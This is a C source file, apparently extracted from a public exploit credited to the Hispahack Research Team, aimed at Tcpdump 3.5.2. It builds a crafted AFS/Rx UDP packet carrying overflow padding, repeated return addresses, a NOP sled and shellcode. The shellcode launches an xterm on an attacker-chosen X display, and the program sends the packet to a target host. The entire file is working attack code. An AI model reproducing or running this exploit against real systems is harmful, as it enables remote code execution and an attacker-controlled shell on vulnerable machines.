
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {void* sin_port; TYPE_1__ sin_addr; void* sin_family; } ;
struct sockaddr {int dummy; } ;
struct rx_header {int flags; void* seq; int type; } ;
typedef int sin ;
typedef int buffer ;
typedef int addr ;


 long ADDR ;
 int AFS_CALL ;
 void* AF_INET ;
 int FS_RX_DPORT ;
 int FS_RX_SPORT ;
 int INADDR_ANY ;
 char NOP ;
 int NUM_ADDR ;
 int NUM_NOP ;
 int OFFSET ;
 int RX_CLIENT_INITIATED ;
 int RX_PACKET_TYPE_DATA ;
 int SOCK_DGRAM ;
 int atoi (char*) ;
 scalar_t__ bind (int,struct sockaddr*,int) ;
 int close (int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 void* htonl (int) ;
 void* htons (int ) ;
 int memcpy (char*,char*,scalar_t__) ;
 int memset (char*,char,int) ;
 int perror (char*) ;
 int printf (char*,char*) ;
 int resolve (char*) ;
 int sendto (int,char*,int,int ,struct sockaddr_in*,int) ;
 char* shellcode ;
 int socket (void*,int ,int ) ;
 int sprintf (char*,char*) ;
 int stderr ;
 scalar_t__ strlen (char*) ;

int main (int argc, char *argv[]) {

 struct sockaddr_in addr,sin;
 int sock,aux, offset=OFFSET;
 char buffer[4048], *chptr;
 struct rx_header *rxh;
 long int *lptr, return_addr=ADDR;


  fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
  fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac <zhodiac@softhome.net>\n\n");


  if (argc<3) {
    printf("Usage: %s <host> <display> [offset]\n",argv[0]);
    exit(-1);
    }

  if (argc==4) offset=atoi(argv[3]);
  return_addr+=offset;

  fprintf(stderr,"Using return addr: %#x\n",return_addr);

  addr.sin_family=AF_INET;
  addr.sin_addr.s_addr=resolve(argv[1]);
  addr.sin_port=htons(FS_RX_DPORT);

  if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
     perror("socket()");
     exit(-1);
     }

  sin.sin_family=AF_INET;
  sin.sin_addr.s_addr=INADDR_ANY;
  sin.sin_port=htons(FS_RX_SPORT);

  if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
      perror("bind()");
      exit(-1);
      }

  memset(buffer,0,sizeof(buffer));
  rxh=(struct rx_header *)buffer;

  rxh->type=RX_PACKET_TYPE_DATA;
  rxh->seq=htonl(1);
  rxh->flags=RX_CLIENT_INITIATED;

  lptr=(long int *)(buffer+sizeof(struct rx_header));
  *(lptr++)=htonl(AFS_CALL);
  *(lptr++)=htonl(1);
  *(lptr++)=htonl(2);
  *(lptr++)=htonl(3);

  *(lptr++)=htonl(420);
  chptr=(char *)lptr;
  sprintf(chptr,"1 0\n");
  chptr+=4;

  memset(chptr,'A',120);
  chptr+=120;
  lptr=(long int *)chptr;
  for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
  chptr=(char *)lptr;
  memset(chptr,NOP,NUM_NOP);
  chptr+=NUM_NOP;
  shellcode[30]=(char)(46+strlen(argv[2]));
  memcpy(chptr,shellcode,strlen(shellcode));
  chptr+=strlen(shellcode);
  memcpy(chptr,argv[2],strlen(argv[2]));
  chptr+=strlen(argv[2]);

  sprintf(chptr," 1\n");

  if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
     perror("send()");
     exit(-1);
     }

  fprintf(stderr,"Packet with Overflow sent, now wait for the xterm!!!! :)\n\n");

  close(sock);
  return(0);
 }
